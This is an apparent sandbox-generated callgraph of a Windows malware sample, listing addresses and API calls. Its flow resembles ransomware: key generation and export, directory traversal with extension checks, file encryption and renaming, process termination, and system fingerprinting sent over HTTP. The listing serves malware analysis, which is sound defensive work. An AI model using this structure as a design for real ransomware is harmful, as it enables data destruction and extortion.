f147d70 10 API calls 1860->1861 1864 f145dae 1861->1864 1865 f145a08 lstrlenA 1862->1865 1864->1779 1867 f145a4e lstrlenA 1865->1867 1872 f145a24 lstrlenA 1865->1872 1868 f145a7e lstrcatW lstrlenW 1867->1868 1876 f145a57 lstrlenA 1867->1876 1869 f1470a0 49 API calls 1868->1869 1871 f145aa8 1869->1871 2131 f1435c0 VirtualAlloc 1871->2131 1873 f145a4a 1872->1873 1873->1867 1876->1868 1877 f145ac5 1878 f145ad0 18 API calls 1877->1878 1879 f145ac9 ExitProcess 1877->1879 1880 f145bcb lstrlenW 1878->1880 1882 f145bf7 lstrlenW VirtualAlloc 1880->1882 1883 f145be9 VirtualFree 1880->1883 1884 f145c2e 1882->1884 1885 f145c1a wsprintfA 1882->1885 1883->1882 2143 f145f00 VirtualAlloc 1884->2143 1885->1884 1888 f145c6f lstrlenA VirtualAlloc lstrlenA 1890 f145c97 lstrlenA 1888->1890 1889 f145c69 GetLastError 1889->1888 1892 f145cd6 lstrlenA MultiByteToWideChar 1890->1892 1896 f145cb0 lstrlenA 1890->1896 2152 f1454f0 1892->2152 1896->1892 1897 f145d5c VirtualFree VirtualFree VirtualFree 1897->1860 1898 f145d0f VirtualFree VirtualFree VirtualFree VirtualFree 1900 f147d70 10 API calls 1898->1900 1901 f145d53 1900->1901 1901->1779 2278 f143cf0 1902->2278 1904 f143dc6 1905 f143fca VirtualFree 1904->1905 1906 f143c70 4 API calls 1904->1906 1905->1773 1907 f143dd3 1906->1907 1907->1905 1908 f143ddb ExpandEnvironmentStringsW wsprintfW VirtualAlloc GetForegroundWindow 1907->1908 1909 f143fb0 ShellExecuteExW 1908->1909 1910 f143fb7 1909->1910 1911 f143fd1 WaitForSingleObject CloseHandle ExitProcess 1909->1911 1910->1909 1912 f143fbd VirtualFree 1910->1912 1912->1905 1914 f14420d VirtualAlloc 1913->1914 1915 f144228 InitializeCriticalSection 1913->1915 1914->1915 1915->1786 1915->1787 1917 f1441e4 1916->1917 1918 f143ff0 280 API calls 1917->1918 1919 f1441ec 1918->1919 2281 f146620 VirtualFree VirtualFree 1919->2281 1921 f1441f4 1921->1791 1923 f144050 GetDriveTypeW 1922->1923 1924 f144065 1923->1924 1924->1923 1925 f1440ae WaitForMultipleObjects GetTickCount 1924->1925 1926 f14406a CreateThread 1924->1926 1927 f14410f 1925->1927 1926->1924 2282 f145670 VirtualAlloc 1927->2282 1929 f1441bd 1929->1791 1931 f143cae GetModuleHandleA GetProcAddress 1930->1931 1932 f143caa 1930->1932 1933 f143cd0 FreeSid 1931->1933 1932->1793 1933->1793 1935 f143cf0 4 API calls 1934->1935 1936 f1445c4 VirtualAlloc 1935->1936 1938 f14477f GetSystemDirectoryW lstrcatW ShellExecuteW 1936->1938 1939 f14477b 1936->1939 1940 f1447af VirtualFree 1938->1940 1939->1940 1940->1794 1941->1804 1943 f1474ce 1942->1943 1944 f1474a9 VirtualAlloc GetUserNameW 1942->1944 1945 f1474d4 VirtualAlloc GetComputerNameW 1943->1945 1946 f1474f6 1943->1946 1944->1943 1945->1946 1947 f147556 1946->1947 1948 f147502 VirtualAlloc 1946->1948 1950 f1475f5 1947->1950 1951 f147560 VirtualAlloc RegOpenKeyExW 1947->1951 1948->1947 1949 f147519 1948->1949 2071 f147410 RegOpenKeyExW 1949->2071 1952 f1475ff VirtualAlloc VirtualAlloc 1950->1952 1953 f1476f9 1950->1953 1955 f14759c RegQueryValueExW 1951->1955 1956 f1475de VirtualFree 1951->1956 1959 f147634 wsprintfW RegOpenKeyExW 1952->1959 1957 f1476ff VirtualAlloc 1953->1957 1958 f14775b 1953->1958 1961 f1475c0 1955->1961 1962 f1475c9 GetLastError 1955->1962 1956->1950 1964 f147410 5 API calls 1957->1964 1966 f147761 GetNativeSystemInfo VirtualAlloc 1958->1966 1967 f1477ce 1958->1967 1965 f147669 RegQueryValueExW 1959->1965 1989 f14768b 1959->1989 1960 f147534 1960->1947 1971 f147551 wsprintfW 1960->1971 1963 f1475cf RegCloseKey 1961->1963 1962->1963 1963->1950 1963->1956 1969 f14772d 1964->1969 1970 f147694 GetLastError 1965->1970 1965->1989 1972 f147784 1966->1972 1973 f1477a7 wsprintfW 1966->1973 1968 f1477e8 1967->1968 2076 f147b70 VirtualAlloc VirtualAlloc 1967->2076 1978 f147939 1968->1978 1979 f1477f9 VirtualAlloc VirtualAlloc GetWindowsDirectoryW GetVolumeInformationW 1968->1979 1969->1958 1981 f147410 5 API calls 1969->1981 1977 f14769a RegCloseKey 1970->1977 1971->1947 1972->1973 1980 f147792 wsprintfW ExitProcess 1972->1980 1973->1967 1974 f1476d6 wsprintfW VirtualFree 1974->1953 1977->1989 1983 f147af2 1978->1983 1984 f147949 VirtualAlloc 1978->1984 1982 f147410 5 API calls 1979->1982 1985 f14774e wsprintfW 1981->1985 1986 f147885 1982->1986 1987 f144810 1983->1987 1988 f147afb VirtualAlloc 1983->1988 2004 f1479a0 1984->2004 1985->1958 1990 f147889 lstrlenW 1986->1990 1991 f1478ba wsprintfW lstrcatW GetModuleHandleW GetProcAddress 1986->1991 2006 f1472a0 1987->2006 1988->1987 1992 f147b19 1988->1992 1989->1959 1989->1974 1989->1977 1989->1980 1993 f147410 5 API calls 1990->1993 1994 f1478fd lstrlenW 1991->1994 1995 f147914 VirtualFree 1991->1995 2093 f146ff0 1992->2093 1993->1991 1994->1995 1995->1978 1997 f1479c2 GetDriveTypeW 1997->2004 2000 f1479e9 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 2003 f147ac3 lstrcatW 2000->2003 2000->2004 2001 f147b24 VirtualFree 2001->1987 2002 f147ae3 lstrlenW 2002->1983 2003->2004 2004->1997 2004->2000 2004->2002 2005 f147a5c lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 2004->2005 2005->2004 2009 f1472b0 2006->2009 2007 f1472ef lstrlenW lstrlenW 2008 f14730a 2007->2008 2010 f147310 lstrlenW lstrlenW 2008->2010 2011 f14732b 2008->2011 2009->2007 2009->2008 2010->2011 2012 f147331 lstrlenW lstrlenW 2011->2012 2013 f14734c 2011->2013 2012->2013 2014 f147352 lstrlenW lstrlenW 2013->2014 2015 f14736d 2013->2015 2014->2015 2016 f147373 lstrlenW lstrlenW 2015->2016 2017 f14738e 2015->2017 2016->2017 2018 f147394 lstrlenW lstrlenW 2017->2018 2019 f1473af 2017->2019 2018->2019 2020 f1473be lstrlenW lstrlenW 2019->2020 2021 f1473d9 2019->2021 2020->2021 2022 f147407 2021->2022 2023 f1473e2 lstrlenW lstrlenW 2021->2023 2022->1808 2023->1808 2025 f1470dc 2024->2025 2026 f1470ba lstrcatW lstrcatW lstrcatW lstrcatW 2024->2026 2027 f1470e1 lstrcatW lstrcatW lstrcatW lstrcatW 2025->2027 2028 f1470fd 2025->2028 2026->2025 2027->2028 2029 f147103 lstrcatW lstrcatW lstrcatW lstrcatW 2028->2029 2030 f14711f 2028->2030 2029->2030 2031 f147125 lstrcatW lstrcatW lstrcatW lstrcatW 2030->2031 2032 f147141 2030->2032 2031->2032 2033 f147147 lstrcatW lstrcatW lstrcatW lstrcatW 2032->2033 2034 f147163 2032->2034 2033->2034 2035 f147185 2034->2035 2036 f147169 lstrcatW lstrcatW lstrcatW lstrcatW 2034->2036 2037 f1471a7 2035->2037 2038 f14718b lstrcatW lstrcatW lstrcatW lstrcatW 2035->2038 2036->2035 2039 f1471ad lstrcatW lstrcatW lstrcatW lstrcatW 2037->2039 2040 f1471c9 2037->2040 2038->2037 2039->2040 2041 f1471cf lstrcatW lstrcatW lstrcatW lstrcatW 2040->2041 2042 f1471eb 2040->2042 2041->2042 2043 f1471f1 VirtualAlloc 2042->2043 2044 f14725c 2042->2044 2045 f147221 wsprintfW 2043->2045 2046 f14720c wsprintfW 2043->2046 2047 f147262 lstrcatW lstrcatW lstrcatW lstrcatW 2044->2047 2048 f14727e lstrlenW 2044->2048 2049 f147230 lstrcatW lstrcatW lstrcatW lstrcatW VirtualFree 2045->2049 2046->2049 2047->2048 2048->1812 2049->2044 2051 f147d7f VirtualFree 2050->2051 2052 f147d8b 2050->2052 2051->2052 2053 f147d91 VirtualFree 2052->2053 2054 f147d9d 2052->2054 2053->2054 2055 f147da3 VirtualFree 2054->2055 2056 f147daf 2054->2056 2055->2056 2057 f147db5 VirtualFree 2056->2057 2058 f147dc1 2056->2058 2057->2058 2059 f147dc7 VirtualFree 2058->2059 2060 f147dd3 2058->2060 2059->2060 2061 f147de5 2060->2061 2062 f147dd9 VirtualFree 2060->2062 2063 f147df7 2061->2063 2064 f147deb VirtualFree 2061->2064 2062->2061 2065 f147dfd VirtualFree 2063->2065 2066 f147e09 2063->2066 2064->2063 2065->2066 2067 f147e0f VirtualFree 2066->2067 2068 f147e1b 2066->2068 2067->2068 2069 f147e24 VirtualFree 2068->2069 2070 f1448aa 2068->2070 2069->2070 2070->1760 2070->1761 2072 f147432 RegQueryValueExW 2071->2072 2073 f14747e 2071->2073 2074 f147466 GetLastError RegCloseKey 2072->2074 2075 f147451 RegCloseKey 2072->2075 2073->1960 2074->1960 2075->1960 2077 f147c32 2076->2077 2078 f147c0c CreateToolhelp32Snapshot 2076->2078 2077->1968 2079 f147c24 VirtualFree 2078->2079 2080 f147c3d Process32FirstW 2078->2080 2079->2077 2081 f147d2d VirtualFree FindCloseChangeNotification 2080->2081 2086 f147c5d 2080->2086 2082 f147d57 2081->2082 2083 f147d4d VirtualFree 2081->2083 2082->1968 2083->2082 2084 f147d07 2085 f147d25 2084->2085 2087 f147d15 lstrlenW 2084->2087 2085->2081 2086->2084 2088 f147caf lstrcatW lstrcatW 2086->2088 2089 f147c9a lstrcpyW lstrcatW 2086->2089 2090 f147ce7 Process32NextW 2086->2090 2087->2085 2091 f147cc0 lstrlenW 2088->2091 2089->2091 2090->2084 2092 f147cf8 GetLastError 2090->2092 2091->2090 2092->2084 2092->2086 2103 f147e40 InternetOpenW 2093->2103 2097 f147046 2098 f147071 VirtualFree 2097->2098 2099 f14704a lstrlenA 2097->2099 2101 f147086 InternetCloseHandle 2098->2101 2102 f14708d 2098->2102 2099->2098 2100 f14705a wsprintfW 2099->2100 2100->2098 2101->2102 2102->1987 2102->2001 2104 f147002 VirtualAlloc lstrlenW 2103->2104 2105 f14802d InternetOpenW 2103->2105 2106 f148050 2104->2106 2105->2104 2107 f148062 InternetCloseHandle 2106->2107 2108 f148069 2106->2108 2107->2108 2109 f147e40 2 API calls 2108->2109 2110 f148070 InternetConnectW 2109->2110 2111 f1480a1 VirtualAlloc wsprintfW HttpOpenRequestW 2110->2111 2112 f148098 2110->2112 2113 f1480f1 HttpAddRequestHeadersW 2111->2113 2114 f1481c2 InternetCloseHandle InternetCloseHandle VirtualFree 2111->2114 2112->2097 2113->2114 2115 f148158 HttpSendRequestW 2113->2115 2114->2097 2116 f1481bc GetLastError 2115->2116 2117 f14816f InternetReadFile 2115->2117 2116->2114 2117->2114 2118 f14818e 2117->2118 2118->2114 2119 f148197 InternetReadFile 2118->2119 2119->2118 2120 f1481ba 2119->2120 2120->2114 2121->1832 2123 f146402 GetLastError 2122->2123 2124 f146438 CryptGenKey 2122->2124 2125 f146428 2123->2125 2126 f14640f CryptAcquireContextW 2123->2126 2127 f146454 2124->2127 2128 f146455 CryptExportKey CryptExportKey CryptDestroyKey CryptReleaseContext CryptAcquireContextW 2124->2128 2125->1771 2126->2125 2129 f14642f 2126->2129 2127->2128 2128->2125 2129->2124 2130->1853 2132 f1435f7 GetModuleFileNameW CreateFileW 2131->2132 2133 f1435f1 2131->2133 2134 f143623 GetFileSize VirtualAlloc 2132->2134 2135 f14369a VirtualFree 2132->2135 2133->1877 2136 f143641 ReadFile 2134->2136 2137 f143693 FindCloseChangeNotification 2134->2137 2135->1877 2138 f143685 VirtualFree 2136->2138 2139 f143656 2136->2139 2137->2135 2138->2137 2139->2138 2140 f143667 2139->2140 2166 f1434f0 lstrlenA VirtualAlloc 2140->2166 2144 f145f33 GetModuleHandleA 2143->2144 2145 f145c40 CryptBinaryToStringA 2143->2145 2146 f145f76 _memset 2144->2146 2147 f145f42 GetProcAddress lstrlenA 2144->2147 2145->1888 2145->1889 2149 f145f90 lstrlenA 2146->2149 2148 f145f65 wsprintfA 2147->2148 2148->2146 2150 f145fa8 2149->2150 2151 f145fb8 VirtualFree 2150->2151 2151->2145 2153 f147e40 2 API calls 2152->2153 2154 f145509 2153->2154 2173 f145220 VirtualAlloc 2154->2173 2157 f14554d lstrcatA lstrlenA lstrlenW lstrlenA 2159 f148050 15 API calls 2157->2159 2163 f1455f4 2159->2163 2160 f145629 VirtualFree VirtualFree VirtualFree 2161 f145656 InternetCloseHandle 2160->2161 2162 f14565d 2160->2162 2161->2162 2162->1897 2162->1898 2163->2160 2182 f1453d0 lstrlenA VirtualAlloc 2163->2182 2165 f145615 2165->2160 2167 f1435af 2166->2167 2168 f143528 CryptStringToBinaryA 2166->2168 2167->2138 2169 f1435a1 VirtualFree 2168->2169 2170 f14353f VirtualAlloc VirtualAlloc 2168->2170 2169->2167 2171 f143576 wsprintfW wsprintfW 2170->2171 2172 f14356f 2170->2172 2171->2169 2172->2171 2174 f145341 lstrlenA VirtualAlloc VirtualAlloc 2173->2174 2175 f14529b 2173->2175 2174->2157 2176 f1452c0 Sleep 2175->2176 2177 f1452cb lstrlenW VirtualAlloc 2175->2177 2176->2177 2216 f145060 CreatePipe 2177->2216 2179 f1452f6 lstrcmpiA 2180 f14531e wsprintfW VirtualFree 2179->2180 2181 f145309 VirtualFree 2179->2181 2180->2174 2181->2175 2183 f145403 CryptStringToBinaryA 2182->2183 2185 f1454dc GetLastError 2183->2185 2186 f145429 2183->2186 2188 f1454c3 VirtualFree 2185->2188 2187 f145f00 7 API calls 2186->2187 2189 f145433 2187->2189 2188->2165 2247 f1433e0 2189->2247 2192 f1454e4 2257 f145350 VirtualAlloc VirtualAlloc 2192->2257 2193 f14544d 2194 f14546f lstrlenA VirtualAlloc 2193->2194 2195 f145498 2193->2195 2194->2195 2197 f145490 lstrcpyA 2194->2197 2198 f1454b4 2195->2198 2202 f1454ac HeapFree 2195->2202 2197->2195 2200 f1454c0 2198->2200 2204 f1454bd HeapFree 2198->2204 2200->2188 2202->2198 2204->2200 2217 f14516f 2216->2217 2218 f145179 SetHandleInformation 2216->2218 2217->2179 2218->2217 2219 f14518f CreatePipe SetHandleInformation 2218->2219 2219->2217 2220 f1451b5 VirtualAlloc 2219->2220 2221 f145204 lstrcpyA 2220->2221 2222 f1451cf wsprintfW 2220->2222 2221->2179 2227 f144e10 2222->2227 2224 f1451e4 2232 f144fb0 2224->2232 2238 f149170 2227->2238 2229 f144e2e CreateProcessW 2230 f144e84 CloseHandle CloseHandle 2229->2230 2231 f144e79 GetLastError 2229->2231 2230->2224 2231->2224 2237 f144fbd 2232->2237 2233 f144fc6 ReadFile 2234 f145035 2233->2234 2233->2237 2235 f145053 VirtualFree 2234->2235 2240 f144ea0 2234->2240 2235->2179 2237->2233 2237->2234 2239 f14917c 2238->2239 2239->2229 2239->2239 2243 f144ecb 2240->2243 2241 f144f05 lstrcpyA 2241->2235 2242 f144f63 lstrlenA 2244 f144f70 lstrcpyA 2242->2244 2243->2241 2243->2242 2245 f144f5d 2243->2245 2244->2235 2245->2241 2261 f1432b0 lstrlenA 2247->2261 2250 f1434d9 ExitProcess 2251 f143412 2251->2192 2251->2193 2254 f143483 lstrlenA GetProcessHeap HeapAlloc 2255 f143407 2254->2255 2256 f1434a5 lstrcpyA 2254->2256 2255->2251 2255->2254 2265 f143190 2255->2265 2269 f143200 2255->2269 2256->2255 2258 f145380 GetModuleFileNameW 2257->2258 2259 f1453b9 ExitProcess 2257->2259 2258->2259 2260 f145392 wsprintfW ShellExecuteW 2258->2260 2260->2259 2262 f1432cf 2261->2262 2263 f1432f8 2261->2263 2264 f1432d0 lstrlenA 2262->2264 2263->2250 2263->2255 2264->2263 2264->2264 2266 f1431b0 lstrcmpiA lstrcmpiA 2265->2266 2267 f14319e 2265->2267 2266->2255 2267->2266 2268 f1431f1 2267->2268 2268->2255 2276 f143210 2269->2276 2270 f14323d 2270->2255 2271 f143250 lstrlenA GetProcessHeap HeapAlloc 2273 f14328d 2271->2273 2272 f14326d 2274 f143272 lstrlenA GetProcessHeap HeapAlloc 2272->2274 2275 f143299 2272->2275 2273->2275 2277 f143291 lstrcpyA 2273->2277 2274->2273 2275->2255 2276->2270 2276->2271 2276->2272 2277->2275 2279 f149170 _memset 2278->2279 2280 f143d47 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 2279->2280 2280->1904 2281->1921 2283 f14569f wsprintfW 2282->2283 2310 f143bc0 GetProcessHeap 2283->2310 2286 f1456f1 2287 f147490 96 API calls 2286->2287 2288 f1456fc 2287->2288 2289 f1472a0 16 API calls 2288->2289 2290 f145707 lstrlenW 2289->2290 2291 f1470a0 49 API calls 2290->2291 2292 f14571d lstrlenW 2291->2292 2293 f145731 VirtualFree 2292->2293 2294 f14573f lstrlenW VirtualAlloc 2292->2294 2293->2294 2295 f145776 2294->2295 2296 f145762 wsprintfA 2294->2296 2297 f145f00 7 API calls 2295->2297 2296->2295 2298 f145785 CryptBinaryToStringA 2297->2298 2299 f1457ae lstrlenA VirtualAlloc lstrlenA 2298->2299 2300 f1457a8 GetLastError 2298->2300 2301 f1457da lstrlenA 2299->2301 2300->2299 2303 f14580e 2301->2303 2308 f1457f1 lstrlenA 2301->2308 2304 f1454f0 100 API calls 2303->2304 2306 f14581b VirtualFree 2304->2306 2307 f147d70 10 API calls 2306->2307 2309 f14584a VirtualFree 2307->2309 2308->2303 2309->1929 2310->2286 2332 f142f50 K32EnumDeviceDrivers 2311->2332 2313 f142d8c 2314 f142de9 GetModuleHandleW LoadCursorW LoadIconW RegisterClassExW 2313->2314 2315 f142f50 6 API calls 2313->2315 2316 f142e75 ExitThread 2314->2316 2317 f142e7b GetModuleHandleW GetModuleHandleW CreateWindowExW SetWindowLongW 2314->2317 2318 f142d99 2315->2318 2319 f142ec5 ShowWindow UpdateWindow CreateThread 2317->2319 2320 f142ebe ExitThread 2317->2320 2318->2314 2325 f142f50 6 API calls 2318->2325 2321 f142ef4 GetMessageW 2319->2321 2322 f142eed CloseHandle 2319->2322 2323 f142f3d ExitThread 2321->2323 2324 f142f0b 2321->2324 2322->2321 2326 f142f17 TranslateMessage DispatchMessageW 2324->2326 2328 f142dce 2325->2328 2326->2323 2327 f142f2c GetMessageW 2326->2327 2327->2323 2327->2326 2328->2323 2341 f1430a0 2328->2341 2333 f142f82 VirtualAlloc 2332->2333 2334 f142f7d 2332->2334 2335 f142f9f K32EnumDeviceDrivers 2333->2335 2336 f142f99 2333->2336 2334->2313 2337 f142ff2 VirtualFree 2335->2337 2339 f142fae 2335->2339 2336->2313 2337->2313 2338 f142fc0 K32GetDeviceDriverBaseNameW 2338->2339 2339->2337 2339->2338 2340 f143009 VirtualFree 2339->2340 2340->2313 2342 f142f50 6 API calls 2341->2342 2343 f143151 2342->2343 2344 f142ddb 2343->2344 2345 f142f50 6 API calls 2343->2345 2344->2323 2350 f142ad0 VirtualAlloc 2344->2350 2346 f143160 2345->2346 2346->2344 2347 f142f50 6 API calls 2346->2347 2348 f14316c 2347->2348 2348->2344 2349 f142f50 6 API calls 2348->2349 2349->2344 2351 f142b02 GetModuleFileNameW GetTempPathW 2350->2351 2353 f142b48 2351->2353 2354 f142b53 lstrlenW 2353->2354 2355 f142b4c 2353->2355 2365 f1482b0 CryptAcquireContextW 2354->2365 2394 f142960 lstrlenW 2355->2394 2358 f142b8e GetEnvironmentVariableW 2359 f142bac 2358->2359 2361 f142bd8 lstrcatW lstrcatW lstrcatW 2359->2361 2364 f142bb0 2359->2364 2360 f142c45 ExitThread 2377 f142890 CreateFileW 2361->2377 2363 f142c2f wsprintfW 2363->2355 2364->2360 2364->2363 2366 f1483c9 2365->2366 2367 f1482db 2365->2367 2366->2358 2367->2367 2368 f1482ee VirtualAlloc 2367->2368 2369 f1483d2 CryptReleaseContext VirtualFree 2368->2369 2370 f14830b 2368->2370 2369->2358 2370->2369 2371 f148313 GetModuleHandleA 2370->2371 2372 f148367 GetProcAddress 2371->2372 2373 f148359 LoadLibraryA 2371->2373 2374 f1483ae 2372->2374 2376 f148376 2372->2376 2373->2372 2373->2374 2375 f1483b0 CryptReleaseContext VirtualFree 2374->2375 2375->2366 2376->2374 2376->2375 2378 f1428b8 GetFileSize 2377->2378 2379 f1428f9 2377->2379 2399 f143030 2378->2399 2379->2364 2382 f143030 6 API calls 2383 f1428d5 CreateFileMappingW 2382->2383 2384 f142902 MapViewOfFile 2383->2384 2385 f1428f2 CloseHandle 2383->2385 2386 f142916 2384->2386 2387 f142948 CloseHandle CloseHandle 2384->2387 2385->2379 2388 f143030 6 API calls 2386->2388 2387->2364 2389 f14291b 2388->2389 2390 f14292b 2389->2390 2404 f148400 CryptAcquireContextW 2389->2404 2415 f142830 CreateFileW 2390->2415 2395 f1482b0 9 API calls 2394->2395 2396 f1429ad RegCreateKeyExW 2395->2396 2397 f142ac0 2396->2397 2398 f142a8e lstrlenW RegSetValueExW RegCloseKey 2396->2398 2397->2360 2398->2360 2400 f142f50 6 API calls 2399->2400 2401 f14307f 2400->2401 2402 f1428c8 2401->2402 2403 f142f50 6 API calls 2401->2403 2402->2382 2403->2402 2405 f1484f2 2404->2405 2406 f14842e VirtualAlloc 2404->2406 2405->2390 2408 f148458 2406->2408 2409 f1484fb CryptReleaseContext VirtualFree 2406->2409 2408->2409 2410 f148461 GetModuleHandleA 2408->2410 2409->2390 2411 f1484b5 GetProcAddress 2410->2411 2412 f1484a7 LoadLibraryA 2410->2412 2413 f1484d9 CryptReleaseContext VirtualFree 2411->2413 2414 f1484c4 2411->2414 2412->2411 2412->2413 2413->2405 2414->2413 2416 f14287f UnmapViewOfFile 2415->2416 2417 f14285b 2415->2417 2416->2387 2418 f142873 2417->2418 2419 f14285f WriteFile 2417->2419 2420 f142878 FindCloseChangeNotification 2418->2420 2419->2418 2419->2420 2420->2416 2421 f142d10 SendMessageW ExitThread 2422 f142c50 2423 f142cda CreateThread DestroyWindow 2422->2423 2424 f142c7b 2422->2424 2425 f142c97 BeginPaint lstrlenW TextOutW EndPaint 2424->2425 2426 f142c80 DefWindowProcW 2424->2426 2427 f145ff0 2428 f146012 2427->2428 2429 f14603e GetPEB 2428->2429 2430 f146058 2429->2430 2452 f149200 IsProcessorFeaturePresent 2453 f149226 2452->2453 2454 f146f40 VirtualAlloc wsprintfW InitializeCriticalSection VirtualAlloc 2457 f146df0 2454->2457 2456 f146fd0 VirtualFree ExitThread 2476 f146780 VirtualAlloc 2457->2476 2459 f146e06 2460 f146f34 2459->2460 2488 f146ba0 lstrlenW lstrcatW FindFirstFileW 2459->2488 2460->2456 2462 f146e15 2462->2460 2503 f146d40 VirtualAlloc wsprintfW CreateFileW 2462->2503 2464 f146e22 lstrlenW lstrcatW FindFirstFileW 2465 f146e64 2464->2465 2466 f146e58 2464->2466 2467 f146e70 lstrcmpW 2465->2467 2466->2456 2468 f146f13 FindNextFileW 2467->2468 2469 f146e8a lstrcmpW 2467->2469 2468->2467 2471 f146f2b FindClose 2468->2471 2469->2468 2470 f146ea0 lstrcatW 2469->2470 2472 f146eb3 lstrcatW 2470->2472 2475 f146ecc 2470->2475 2471->2460 2474 f146df0 102 API calls 2472->2474 2474->2475 2475->2468 2509 f146ab0 VirtualAlloc wsprintfW 2475->2509 2478 f1467a7 2476->2478 2477 f1468d4 VirtualFree 2477->2459 2478->2477 2479 f14684f SHGetSpecialFolderPathW 2478->2479 2480 f146860 2479->2480 2481 f14686d SHGetSpecialFolderPathW 2479->2481 2480->2477 2480->2481 2482 f146887 SHGetSpecialFolderPathW 2481->2482 2483 f14687a 2481->2483 2484 f146894 2482->2484 2485 f1468a1 SHGetSpecialFolderPathW 2482->2485 2483->2477 2483->2482 2484->2477 2484->2485 2486 f1468ae 2485->2486 2487 f1468bb VirtualFree 2485->2487 2486->2477 2486->2487 2487->2459 2489 f146bf0 lstrcmpW 2488->2489 2490 f146c06 lstrcmpW 2489->2490 2491 f146d12 FindNextFileW 2489->2491 2490->2491 2493 f146c1c lstrcatW lstrlenW 2490->2493 2491->2489 2492 f146d2a FindClose 2491->2492 2492->2462 2502 f146c3f 2493->2502 2494 f146c54 lstrcmpW 2495 f146c64 CreateFileW GetFileSize 2494->2495 2494->2502 2496 f146c91 VirtualAlloc 2495->2496 2497 f146cf2 CloseHandle 2495->2497 2498 f146ca6 ReadFile 2496->2498 2496->2502 2497->2492 2497->2502 2499 f146ce1 VirtualFree 2498->2499 2498->2502 2499->2502 2500 f146cc9 lstrlenA 2517 f146b40 lstrlenA 2500->2517 2502->2491 2502->2494 2502->2497 2502->2499 2502->2500 2504 f146d8c GetLastError 2503->2504 2505 f146d9e 2503->2505 2506 f146dd0 VirtualFree 2504->2506 2507 f146dc4 CloseHandle 2505->2507 2508 f146da7 lstrlenW WriteFile 2505->2508 2506->2464 2507->2506 2508->2507 2519 f1469b0 2509->2519 2512 f146aea 2516 f146b07 VirtualFree 2512->2516 2527 f1468f0 lstrlenW lstrlenW 2512->2527 2514 f146b03 2514->2516 2539 f1437b0 GetFileAttributesW SetFileAttributesW 2514->2539 2516->2475 2518 f146b5a 2517->2518 2518->2502 2520 f1469c0 2519->2520 2521 f1469ca lstrlenW 2519->2521 2520->2512 2522 f1469f0 2521->2522 2523 f1469de 2521->2523 2522->2512 2523->2522 2524 f1469fb lstrlenW VirtualAlloc wsprintfW 2523->2524 2526 f146a38 VirtualFree 2524->2526 2526->2512 2528 f14691e lstrcmpiW 2527->2528 2531 f14690c 2527->2531 2529 f146933 2528->2529 2530 f14693c lstrcmpiW 2528->2530 2529->2514 2530->2529 2532 f146948 lstrcmpiW 2530->2532 2531->2528 2532->2529 2533 f146954 lstrcmpiW 2532->2533 2533->2529 2534 f146960 lstrcmpiW 2533->2534 2534->2529 2535 f14696c lstrcmpiW 2534->2535 2535->2529 2536 f146978 lstrcmpiW 2535->2536 2536->2529 2537 f146984 lstrcmpiW 2536->2537 2537->2529 2538 f146990 lstrcmpiW 2537->2538 2538->2514 2569 f146500 2539->2569 2542 f148400 9 API calls 2543 f143875 2542->2543 2544 f148400 9 API calls 2543->2544 2545 f143885 VirtualAlloc VirtualAlloc 2544->2545 2571 f146660 EnterCriticalSection CryptAcquireContextW 2545->2571 2548 f143927 2551 f146660 10 API calls 2548->2551 2549 f1438fb MessageBoxA 2550 f143ba8 VirtualFree 2549->2550 2550->2516 2552 f14393c 2551->2552 2553 f143962 2552->2553 2554 f143943 GetLastError 2552->2554 2555 f143975 CreateFileW 2553->2555 2554->2550 2556 f1439cc VirtualAlloc VirtualAlloc 2555->2556 2557 f14399d VirtualFree VirtualFree 2555->2557 2558 f143a05 ReadFile 2556->2558 2557->2550 2559 f143b10 VirtualFree 2558->2559 2562 f143a02 _memmove 2558->2562 2560 f143b62 CloseHandle VirtualFree VirtualFree VirtualFree 2559->2560 2561 f143b28 WriteFile WriteFile WriteFile 2559->2561 2563 f143ba5 2560->2563 2564 f143b99 MoveFileW 2560->2564 2561->2560 2562->2558 2562->2559 2565 f143a58 VirtualAlloc 2562->2565 2566 f143a77 VirtualAlloc 2562->2566 2567 f143ab5 VirtualFree SetFilePointer WriteFile 2562->2567 2568 f143af7 VirtualFree 2562->2568 2563->2550 2564->2563 2565->2562 2566->2562 2566->2567 2567->2562 2567->2568 2568->2559 2568->2562 2570 f1437f6 VirtualAlloc lstrcpyW lstrcatW 2569->2570 2570->2542 2572 f1466d1 CryptImportKey 2571->2572 2573 f14669b GetLastError 2571->2573 2576 f146755 CryptReleaseContext LeaveCriticalSection 2572->2576 2577 f1466f6 CryptGetKeyParam CryptEncrypt GetLastError 2572->2577 2574 f1466a8 CryptAcquireContextW 2573->2574 2575 f1438f4 2573->2575 2574->2575 2579 f1466c8 2574->2579 2575->2548 2575->2549 2576->2575 2577->2576 2578 f14674d 2577->2578 2578->2576 2579->2572 2580 f144dc0 2581 f144ddd CreateThread 2580->2581 2582 f144dd9 2580->2582 2581->2582 2583 f144dfb CloseHandle 2581->2583 2583->2582 2431 f144a78 2433 f144a74 2431->2433 2432 f144a8f OpenProcess 2432->2433 2434 f144aa1 TerminateProcess CloseHandle 2432->2434 2433->2432 2435 f144ac4 Process32NextW 2433->2435 2434->2433 2435->2433 2436 f144ad7 2435->2436 2437 f144ae9 FindCloseChangeNotification 2436->2437 2438 f144adb VirtualFree 2436->2438 2438->2437 2584 f146e69 2585 f146e70 lstrcmpW 2584->2585 2586 f146f13 FindNextFileW 2585->2586 2587 f146e8a lstrcmpW 2585->2587 2586->2585 2589 f146f2b FindClose 2586->2589 2587->2586 2588 f146ea0 lstrcatW 2587->2588 2590 f146eb3 lstrcatW 2588->2590 2594 f146ecc 2588->2594 2591 f146f34 2589->2591 2593 f146df0 111 API calls 2590->2593 2592 f146ab0 69 API calls 2592->2594 2593->2594 2594->2586 2594->2592

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
